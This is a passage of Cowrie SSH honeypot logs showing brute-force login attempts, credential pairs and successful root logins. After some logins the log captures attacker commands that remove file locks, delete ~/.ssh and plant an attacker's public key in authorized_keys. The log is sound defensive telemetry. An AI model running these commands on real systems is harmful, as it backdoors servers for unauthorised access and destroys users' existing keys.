s256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:49:50.365968Z","src_ip":"46.101.8.63","session":"9e5f696678eb"}
{"eventid":"cowrie.login.failed","username":"super","password":"super","message":"login attempt [super/super] failed","sensor":"my-vps","timestamp":"2025-09-08T23:49:50.500316Z","src_ip":"46.101.8.63","session":"9e5f696678eb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:49:51.526428Z","src_ip":"46.101.8.63","session":"9e5f696678eb"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":37598,"dst_ip":"1.2.3.4","dst_port":22,"session":"16ad8546ce35","protocol":"ssh","message":"New connection: 45.150.34.92:37598 (1.2.3.4:22) [session: 16ad8546ce35]","sensor":"my-vps","timestamp":"2025-09-08T23:49:54.683387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:49:54.684698Z","src_ip":"45.150.34.92","session":"16ad8546ce35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:49:55.616937Z","src_ip":"45.150.34.92","session":"16ad8546ce35"}
{"eventid":"cowrie.login.failed","username":"butter","password":"butter@123","message":"login attempt [butter/butter@123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:49:55.891315Z","src_ip":"45.150.34.92","session":"16ad8546ce35"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:49:56.911508Z","src_ip":"45.150.34.92","session":"16ad8546ce35"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":49200,"dst_ip":"1.2.3.4","dst_port":22,"session":"908c246c4bf8","protocol":"ssh","message":"New connection: 182.18.161.165:49200 (1.2.3.4:22) [session: 908c246c4bf8]","sensor":"my-vps","timestamp":"2025-09-08T23:50:07.240277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:50:07.241178Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:50:07.499889Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.login.success","username":"root","password":"nihao123!","message":"login attempt [root/nihao123!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:50:08.577579Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:50:09.116116Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:50:09.116828Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:50:09.117724Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:09.377912Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:50:09.993978Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:50:09.994641Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:50:10.255524Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:10.256403Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":59612,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a3630e238ec","protocol":"ssh","message":"New connection: 182.18.161.165:59612 (1.2.3.4:22) [session: 8a3630e238ec]","sensor":"my-vps","timestamp":"2025-09-08T23:50:10.528530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:50:10.529346Z","src_ip":"182.18.161.165","session":"8a3630e238ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:50:10.795324Z","src_ip":"182.18.161.165","session":"8a3630e238ec"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:50:11.901421Z","src_ip":"182.18.161.165","session":"8a3630e238ec"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:13.169328Z","src_ip":"182.18.161.165","session":"8a3630e238ec"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":59618,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2564c6ee7ea","protocol":"ssh","message":"New connection: 182.18.161.165:59618 (1.2.3.4:22) [session: a2564c6ee7ea]","sensor":"my-vps","timestamp":"2025-09-08T23:50:13.415266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:50:13.415880Z","src_ip":"182.18.161.165","session":"a2564c6ee7ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:50:13.670991Z","src_ip":"182.18.161.165","session":"a2564c6ee7ea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:50:14.733869Z","src_ip":"182.18.161.165","session":"a2564c6ee7ea"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:14.991384Z","src_ip":"182.18.161.165","session":"908c246c4bf8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:14.992297Z","src_ip":"182.18.161.165","session":"a2564c6ee7ea"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":58874,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff716790b710","protocol":"ssh","message":"New connection: 93.113.63.124:58874 (1.2.3.4:22) [session: ff716790b710]","sensor":"my-vps","timestamp":"2025-09-08T23:50:38.392696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:50:38.393626Z","src_ip":"93.113.63.124","session":"ff716790b710"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:50:38.464520Z","src_ip":"93.113.63.124","session":"ff716790b710"}
{"eventid":"cowrie.login.failed","username":"supervisor","password":"changeme","message":"login attempt [supervisor/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:50:38.883099Z","src_ip":"93.113.63.124","session":"ff716790b710"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:39.957358Z","src_ip":"93.113.63.124","session":"ff716790b710"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":53472,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d6d65a906e3","protocol":"ssh","message":"New connection: 46.101.8.63:53472 (1.2.3.4:22) [session: 0d6d65a906e3]","sensor":"my-vps","timestamp":"2025-09-08T23:50:46.989123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:50:46.989991Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.011751Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.login.success","username":"root","password":"wu123456","message":"login attempt [root/wu123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.140397Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:50:47.243759Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.244525Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.245345Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.267884Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:50:47.328470Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.329270Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.354116Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.355176Z","src_ip":"46.101.8.63","session":"0d6d65a906e3"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":53658,"dst_ip":"1.2.3.4","dst_port":22,"session":"61c5cbb5e73e","protocol":"ssh","message":"New connection: 46.101.8.63:53658 (1.2.3.4:22) [session: 61c5cbb5e73e]","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.374593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.375614Z","src_ip":"46.101.8.63","session":"61c5cbb5e73e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.396926Z","src_ip":"46.101.8.63","session":"61c5cbb5e73e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:50:47.523587Z","src_ip":"46.101.8.63","session":"61c5cbb5e73e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:50:48.547301Z","src_ip":"46.101.8.63","session":"61c5cbb5e73e"}
